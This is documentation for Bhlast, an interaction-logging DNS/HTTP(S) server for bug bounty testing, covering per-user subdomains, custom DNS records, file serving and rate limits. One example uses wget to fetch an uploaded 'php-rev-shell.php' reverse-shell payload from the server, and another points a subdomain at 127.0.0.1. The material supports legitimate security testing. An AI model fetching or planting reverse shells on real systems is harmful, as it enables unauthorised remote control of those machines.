Bhlast
Motivation
Blind attacks are somewhat difficult, since you have to have a server that will listen to interactions.
Burp collaborator is a great way to listen to interactions, but if you want your server to listen to interactions even when you are not hacking, you have to use some other site.
ProjectDiscovery published an amazing tool called interactsh, which allows you to self-host it to leverage some features.
Since this platform is meant to eliminate as much of the boring work that you need to do in order to be successful, and to work on the stuff while you are not hacking, having this functionality is a must.
Therefore, I decided to learn from their implementation, and start building it. The new implementation is not feature complete. It only supports DNS and HTTP(s) protocols. This is good enough to get started, and the rest will be added as needed.
How it works?
New server is registered behind the bhlast.com domain.
In order to create your unique server, you have to have an account on the BountyHub platform.
Each server gets random subdomain unique to your account. In order to avoid having spam notifications, please do not share your
bhlast server publically. Every interaction with this server will be tracked, and you will get notified for no good reason.
Server is listening on following:
- HTTP (TCP port 80)
- HTTPS (TCP port 443)
- DNS (TCP and UDP port 53)
- Serve static files
- Get notified on interactions
Default behavior
To track interactions per user, each user will get unique subdomain. Everything associated with that subdomain, or subdomain of that subdomain will be tracked for your account.
HTTP
When you visit the bhlast.com, static page will be displayed. This static page is only used to point you to the documentation, and to show basic information about this server.
The bhlast.com supports both HTTP and HTTPS. The same
server will be used to serve custom responses (soon), and
to serve static files. As with everything, if notifications
are configured, each interaction will issue a notification.
DNS
The DNS server is created not only to track DNS interactions, but also to provide a configurable way you can use to serve CUSTOM DNS records.
For example, let's say your ID is ng3iqaju5npgoeuo.
Each interaction with ng3iqaju5npgoeuo.bhlast.com will
be recorded. However, let's say you want to create a
DNS record that will serve address for localhost.
You can create a subdomain with A record to point to
127.0.0.1. Let's call that record localhost. Now,
when localhost.ng3iqaju5npgoeuo.bhlast.com is requested,
the interaction will be tracked and the A record will
be served, pointing to 127.0.0.1.
Learn more about how to configure the DNS server here.
Server registration and configuration
Registration
Once you are logged into the platform, on the right drawer, you will see tab named Bhlast servers. Click on it.
On top of the page, you will see Register Server button. Click on it, and you will be taken to the registration page.
Working with your server
Your bhlast server can be used to:
- Track interactions
- Serve files
- Standard responses
Tracking interactions
Interactions are shown for each request that is associated with your subdomain. The [id] portion of your subdomain is
the identifier used to associate interaction with it. In other words, let's say your subdomain is lwwhkmc4n2ziyu3d. Then
all traffic directed to lwwhkmc4n2ziyu3d.bhlast.com and *.lwwhkmc4n2ziyu3d.bhlast.com is registered associated with your
server.
Serving files
Your server can also be used as a file server. Think of it as python3 -m http.server 80, but listening both on port 80 and 443.
In order to serve file, route /-/ is exposed for that purpose.
As an example, let's say your server is located at lwwhkmc4n2ziyu3d.bhlast.com. You uploaded a php-rev-shell.php.
You can retrieve it by running wget https://o66322a9ufqn02o0.bhlast.com/-/php-rev-shell.php. The important thing to note
is that the interaction on your file server is also tracked, so you can later prove that server pulled the file.
Standard responses
By default, subdomain reversed will be served as a string. However, there are special cases to change format of responses.
| Path | Response format |
|---|---|
Path ending with .xml | The result will be in format <data>[reverse subdomain string]</data> |
Path ending with .json | The result will be in format {"data": "[reverse subdomain string]"} |
/robots.txt | User-agent: *\nDisallow: / # [reverse subdomain string] |
Rate limits
To avoid misuse or malicious use of bhlast servers, the rate limiter is implemented.
| Server type | Global rate limit / s | Per IP rate limit / s |
|---|---|---|
| DNS | 5000 | 10 |
| HTTP(s) | 5000 | 20 |
Furthermore, if the number of questions in a DNS query exceeds 8, the DNS request will be rejected completely. This should reduce DNS amplification attacks.